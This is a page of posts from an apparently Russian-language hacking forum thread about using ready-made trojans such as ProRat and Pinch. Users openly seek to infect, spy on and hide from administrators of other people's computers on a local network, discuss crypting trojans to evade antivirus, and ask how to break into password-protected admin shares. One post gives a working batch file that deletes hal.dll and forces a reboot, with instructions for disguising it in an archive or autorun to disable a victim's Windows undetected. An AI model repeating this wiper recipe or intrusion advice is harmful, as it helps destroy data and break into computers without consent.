terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » ТРОЯНЫ пользование уже готовыми...


ТРОЯНЫ пользование уже готовыми...

Сообщений 21 страница 40 из 68

21

Я очень рад что вы все так помогаете нам понять  что к чему.спасибо парни!

0

22

Я пинч скачать че то немогу ссылка перекидывает на сайт http://www.dndialog.com/

Отредактировано SIRR (2008-01-23 00:05:59)

0

23

Попробовал все получилось) при отключнии антивируника.но хотелось бы троянчик который не палиться :) кому несложно выложите

0

24

Народ, исходники паблик крипторов в нете трудно найти! а свой сделать это очень тяжело, одного желания мало! Я думаю вы это понимаете?
Легче научиться популярному сейчас способу отладки экзешников таким образом, чтобы они авирями не палились! Сейчас в нете полно подобной инфы! Правда надо уметь с отладчиком работать, нокриптор свой написать гораздо сложнее, поверьте мне!!!

0

25

Ребята чтобы написать свой криптор...идею не для новичков.Нужно хорошие знания как ассамблера, (но можна такие вещи творить и на других языках)..+хорошо разбираться в структуре PE-файлов....А уж потом думать о релизе...

0

26

ch1pa написал(а):

но можна такие вещи творить и на других языках

Например на каких?

0

27

на Delphi или C(C++)

0

28

Опишите пожалуйста как правильно криптовать сервер

0

29

И как мне узнать айпишники компов с трояном если я сервера не отсылаю открываю к ним доступ на своем винте. Знаю что есть сканеры. Но они работаю с одним видом трояна или с разными? А ещё как мне скрыть в локалке свой IP и МАС. Если я начну "работать"  с компом "товарища" меня админ может вычислить. Надо застраховаться. А потом уже лезть.

0

30

roxa, ты красавчик!!!
Столько текста, а толку нет! Ладно, что-то придумаем!
Криптовка используется для защиты програм или для безпалевности перед антивирусами. Чтобы закриптовать файл - нужно скачать криптор, а дальше по иструкции... Ну обычно, выбрать файл и нажать кнопочку Crypt. Криптуют, как ты понял, выполняемые, то есть exe-файлы!
Дальше...

И как мне узнать айпишники компов с трояном если я сервера не отсылаю открываю к ним доступ на своем винте

Если в трояне нету такой функции(присылка тебе IP), то тогда по тем данным, что тебе пришли(мыло с паролем...). А вообще, зачем тебе IP?

Знаю что есть сканеры. Но они работаю с одним видом трояна или с разными

Сканеров троянов не бывает! Только антивирусы! :) Возможно, ты имеешь ввиду сканеры уязвимостей?! Так они к троянам не имеют никакого отношения! Они проверяют софт на наличие дырок!

А ещё как мне скрыть в локалке свой IP и МАС

Эта проезженная тема. Лезь в гугл! Мак наверное не скроется, так как это идентификатор сетевой карты, а айпи с помощью софта вроде можна! Я сейчас софтинку такую и не припомню! Короче гугл рулит!

Если я начну "работать"  с компом "товарища" меня админ может вычислить

Это вопрос или утверждение?

0

31

СПАСИБО ОЗЯ что ответил!!

Мда вопросы задал неправильно. Щас попробую описать ситуацию по другому.

1.У меня бэкдор "В Жопе2" касперский не берет (пока). Я в локалке хочу просмотреть инфу на компах. Но "ж*па" не пишет какие   
   компы заразились. (Я не отсылаю сервер, а открываю к нему доступ по сетке). На мыло ничего не приходит. Проверял на кенте -
   работает четко. Но я его IP знал и просто ему отослал сервер (он знал что скидую трояна).
2. Как спрятаться от админа чтоб не вычеслил в случае чего кто это там "попу" рассылает? Просто скрыть IP?

И еще вопрос для ОЗИ - если сканер уязвимости нашел комп и пишет что он уязвимый (типа доступ к дискам С$, D$, E$. При попытке на них зайти высвечивает имя "админ" и ввести пароль. Как можно на него залезть?

Если чегото не так написал простите - (я полный юзер, чайник, компьютеры до этого собирал просто, ну винду устанавливал, проги и т.д. А щас решил дальше поучится. Для начала чужими прогами попользоваться, чтобы на практике выяснить терминологию, общий принцип и т.д.)

0

32

СПАСИБО ОЗЯ что ответил!!

на какой вопрос ты не получил ответа? уточни пожалуйста.
бекдур... локалка.... ясно...

И еще вопрос для ОЗИ - если сканер уязвимости нашел комп и пишет что он уязвимый (типа доступ к дискам С$, D$, E$. При попытке на них зайти высвечивает имя "админ" и ввести пароль. Как можно на него залезть?

это выдает  потому что админ твой походу что-то не учел и неправильно выставил права... ты очень сыро всё описал...
здесь не экстрасенсы сидят...
читая твой пост возникает вопрос:
1. какой сканер ты юзал
2. что именно он написал
3. какова цель скана
4. что ты сканировал (локалку, юзера из инета)

0

33

У меня вот такая проблема: Скачал уже раза 3 с разных источников ProRat1.9 (знаю, что раритет уже, но нада с чего нить начинать)
и везде у меня не запускается файл ProRat.exe. На который, в моём имхо и нада тыкать. Из архива он не запускается, ошибка вылазит, а если в папку извлечь, то и ваще этот файл исчезает (авир отключал). Кстать, чтоб запустить ProRat нада на ProRat.exe тыкать?  :) Помогите пожалста, а то я с этой прогой уже часа 2 парюсь...

Не судите строго за такие вопросы..ведь тематика форума и есть обучение.
Я в этом деле полный новичок. Узнал о существовании cmd ток 2 недели назад. Я думаю вы помните свои чувства, когда первый раз ёпнули комп надоедливому соседу, думаю вы меня поймёте :D

0

34

на какой вопрос ты не получил ответа? уточни пожалуйста.
бекдур... локалка.... ясно...

Как мне выяснить IP зараженных компьютеров или перебирать их все вручную?

1. какой сканер ты юзал
2. что именно он написал
3. какова цель скана
4. что ты сканировал (локалку, юзера из инета)

1 сканер - Essential NetTools 4
2 пишет что по такому-то IP "сервер похоже допускает доступ с любым именем пользователя и паролем( режим простого доступа к файлам)" Далее список дисков С$, D$, E$ (тип - папка, описание стандартный общий ресурс) Когда пытаюсь открыть диск выдает подключение к "Владу" - ввести пароль
3. цель скана - найти уязвимый компьютер на который можно влезть (инфу скачать)
4. сканировал локалку

Спасибо за то что учите

0

35

ozia написал(а):

сам трой мона скачать легко (proRat)... прописав в поисковике название....

Что то я не заметил... то архивы битые, то ещё какая нить лажа...
А офф сайт говорит ошибку страницы*плакаит*
Два раза (скачивал с разных ресурсов) при запуске проги писал: Что я не имею прав запускать данную программу
Озь, помоги если можешь, пжалст

Отредактировано Life Lover (2008-02-13 20:09:23)

0

36

Life Lover
Если нету прав, то значит ты сидишь не на админке.

0

37

ребята привет,кто то может помоч с proRAT!?
вобще не хочет коннектится..!!!незнаю что делать...все правильно,по выше изложеной иструкции,а коннэкт не дает((

0

38

попробуй конегтится к себе самому...

0

39

Напишу о том как снести винду, конечно метод очень и очень старый, но как не странно антивирусы этот файлик не распознают.
Создаёте txt файл, вписываете туда команду:
erase C:\windows\system32\hal.dll
shutdown -r -t 0
Сохраняете изменения и переписываете расширение файла на bat, после этого помещяете этот файл в папку с любой программой и архивируете её, при архивировании создавайте ярлык который будет запускать сразу и прогу и этот файл, к сажалению я не помню атрибут такого ярлыка, после того как кто-то пытается запустить программу через этот ярлык происходит перезагрузка и винда больше не запускается, ещё можно добавить этот файл ещё в один архив и задать путь C:\ и создать файл автозапуска на этот файл, тогда каждый раз когда жертва ламер будет пытаться зайти в винт у него будет слитать винда.
Если команду erase поменять на del то касперский распознёт этот файл как троян вин киллер, если оставить всё как есть то не один антивирус не обращяет внимания на этот файл.

0

40

eBrewa написал(а):

ребята привет,кто то может помоч с proRAT!?
вобще не хочет коннектится..!!!незнаю что делать...все правильно,по выше изложеной иструкции,а коннэкт не дает((

У самого такая проблема. Сам к себе конектюсь. А все равно каку всякую пишет.  Пользуюсь другим Бэкдором и тебе советую

0


Вы здесь » terminal-s52 » Хакинг » ТРОЯНЫ пользование уже готовыми...